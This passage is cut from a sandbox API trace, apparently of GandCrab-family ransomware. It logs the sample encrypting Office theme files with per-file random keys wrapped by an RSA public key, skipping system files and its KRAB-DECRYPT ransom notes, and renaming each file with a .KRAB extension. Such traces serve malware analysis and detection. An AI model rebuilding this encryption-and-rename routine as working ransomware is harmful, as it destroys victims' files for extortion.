lpNewFilePointer=0xffffffff) returned 1 [0063.342] WriteFile (in: hFile=0x478, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x883d3, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x883d3, lpOverlapped=0x0) returned 1 [0063.343] WriteFile (in: hFile=0x478, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0063.343] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.350] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.352] CloseHandle (hObject=0x478) returned 1 [0063.361] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.361] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457444[[fn=basis]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457444[[fn=basis]].thmx.krab")) returned 1 [0063.362] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.363] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0063.363] lstrcmpW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2=".") returned 1 [0063.363] lstrcmpW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="..") returned 1 [0063.363] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03457464[[fn=Dividend]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx" [0063.363] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0063.363] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx.KRAB") returned 137 [0063.363] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx") returned 132 [0063.363] lstrlenW (lpString=".thmx") returned 5 [0063.363] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0063.364] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0063.364] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.364] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx") returned 132 [0063.364] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx") returned 132 [0063.364] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="desktop.ini") returned 1 [0063.364] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="autorun.inf") returned 1 [0063.364] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="ntuser.dat") returned 1 [0063.364] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="iconcache.db") returned 1 [0063.373] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="bootsect.bak") returned 1 [0063.373] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="boot.ini") returned 1 [0063.373] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="ntuser.dat.log") returned 1 [0063.373] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="thumbs.db") returned 1 [0063.373] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0063.373] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0063.373] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0063.373] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="ntldr") returned 1 [0063.373] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="NTDETECT.COM") returned 1 [0063.373] lstrcmpiW (lpString1="TM03457464[[fn=Dividend]].thmx", lpString2="Bootfont.bin") returned 1 [0063.373] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0063.374] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbca08) returned 1 [0063.374] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0063.375] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0063.375] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0063.375] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0063.375] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0063.375] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.375] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbca08) returned 1 [0063.376] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0063.376] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0063.376] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0063.376] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0063.376] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0063.376] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.377] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbca08) returned 1 [0063.377] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbdc20) returned 1 [0063.377] CryptGetKeyParam (in: hKey=0xfbdc20, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0063.377] CryptEncrypt (in: hKey=0xfbdc20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0063.378] GetLastError () returned 0x0 [0063.378] CryptDestroyKey (hKey=0xfbdc20) returned 1 [0063.378] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0063.378] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbca08) returned 1 [0063.378] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbdc20) returned 1 [0063.378] CryptGetKeyParam (in: hKey=0xfbdc20, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0063.378] CryptEncrypt (in: hKey=0xfbdc20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0063.379] GetLastError () returned 0x0 [0063.379] CryptDestroyKey (hKey=0xfbdc20) returned 1 [0063.379] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0063.379] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457464[[fn=dividend]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x478 [0063.380] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0063.380] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0063.381] ReadFile (in: hFile=0x478, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x8b615, lpOverlapped=0x0) returned 1 [0063.474] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfff749eb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.475] WriteFile (in: hFile=0x478, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x8b615, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x8b615, lpOverlapped=0x0) returned 1 [0063.478] WriteFile (in: hFile=0x478, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0063.479] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.488] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.547] CloseHandle (hObject=0x478) returned 1 [0063.566] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.566] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457464[[fn=dividend]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457464[[fn=dividend]].thmx.krab")) returned 1 [0063.567] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.568] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0063.568] lstrcmpW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2=".") returned 1 [0063.568] lstrcmpW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="..") returned 1 [0063.568] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03457475[[fn=Frame]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx" [0063.568] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0063.568] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx.KRAB") returned 134 [0063.568] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx") returned 129 [0063.568] lstrlenW (lpString=".thmx") returned 5 [0063.568] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0063.568] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0063.568] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.569] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx") returned 129 [0063.569] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx") returned 129 [0063.569] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="desktop.ini") returned 1 [0063.569] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="autorun.inf") returned 1 [0063.569] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="ntuser.dat") returned 1 [0063.569] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="iconcache.db") returned 1 [0063.569] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="bootsect.bak") returned 1 [0063.569] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="boot.ini") returned 1 [0063.569] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="ntuser.dat.log") returned 1 [0063.569] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="thumbs.db") returned 1 [0063.569] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0063.569] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0063.569] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0063.569] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="ntldr") returned 1 [0063.569] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="NTDETECT.COM") returned 1 [0063.569] lstrcmpiW (lpString1="TM03457475[[fn=Frame]].thmx", lpString2="Bootfont.bin") returned 1 [0063.569] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0063.570] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbbc38) returned 1 [0063.570] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0063.571] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0063.571] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0063.571] CryptGenRandom (in: hProv=0xfbbc38, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0063.571] CryptReleaseContext (hProv=0xfbbc38, dwFlags=0x0) returned 1 [0063.571] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.571] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbbbb0) returned 1 [0063.572] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0063.572] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0063.572] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0063.572] CryptGenRandom (in: hProv=0xfbbbb0, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0063.572] CryptReleaseContext (hProv=0xfbbbb0, dwFlags=0x0) returned 1 [0063.572] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.573] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbb220) returned 1 [0063.573] CryptImportKey (in: hProv=0xfbb220, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbdc20) returned 1 [0063.573] CryptGetKeyParam (in: hKey=0xfbdc20, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0063.573] CryptEncrypt (in: hKey=0xfbdc20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0063.574] GetLastError () returned 0x0 [0063.574] CryptDestroyKey (hKey=0xfbdc20) returned 1 [0063.574] CryptReleaseContext (hProv=0xfbb220, dwFlags=0x0) returned 1 [0063.574] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbc210) returned 1 [0063.574] CryptImportKey (in: hProv=0xfbc210, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbdc20) returned 1 [0063.574] CryptGetKeyParam (in: hKey=0xfbdc20, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0063.574] CryptEncrypt (in: hKey=0xfbdc20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0063.575] GetLastError () returned 0x0 [0063.575] CryptDestroyKey (hKey=0xfbdc20) returned 1 [0063.575] CryptReleaseContext (hProv=0xfbc210, dwFlags=0x0) returned 1 [0063.575] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457475[[fn=frame]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0063.615] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0063.615] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0063.615] ReadFile (in: hFile=0x488, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x7fb28, lpOverlapped=0x0) returned 1 [0065.066] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfff804d8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.066] WriteFile (in: hFile=0x488, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x7fb28, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x7fb28, lpOverlapped=0x0) returned 1 [0065.067] WriteFile (in: hFile=0x488, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0065.067] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.088] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.090] CloseHandle (hObject=0x488) returned 1 [0065.099] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.099] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457475[[fn=frame]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457475[[fn=frame]].thmx.krab")) returned 1 [0065.100] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.100] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0065.100] lstrcmpW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2=".") returned 1 [0065.100] lstrcmpW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="..") returned 1 [0065.100] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03457485[[fn=Mesh]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx" [0065.100] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0065.101] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx.KRAB") returned 133 [0065.101] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx") returned 128 [0065.101] lstrlenW (lpString=".thmx") returned 5 [0065.101] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0065.101] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0065.101] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.101] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx") returned 128 [0065.102] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx") returned 128 [0065.102] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="desktop.ini") returned 1 [0065.102] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="autorun.inf") returned 1 [0065.102] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="ntuser.dat") returned 1 [0065.102] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="iconcache.db") returned 1 [0065.102] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="bootsect.bak") returned 1 [0065.102] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="boot.ini") returned 1 [0065.102] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="ntuser.dat.log") returned 1 [0065.102] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="thumbs.db") returned 1 [0065.102] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0065.102] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0065.102] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0065.102] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="ntldr") returned 1 [0065.102] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="NTDETECT.COM") returned 1 [0065.102] lstrcmpiW (lpString1="TM03457485[[fn=Mesh]].thmx", lpString2="Bootfont.bin") returned 1 [0065.102] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0065.102] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb990) returned 1 [0065.103] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0065.103] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0065.103] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0065.104] CryptGenRandom (in: hProv=0xfbb990, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0065.104] CryptReleaseContext (hProv=0xfbb990, dwFlags=0x0) returned 1 [0065.104] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.104] CryptAcquireContextW (in: phProv=0x338dd34, 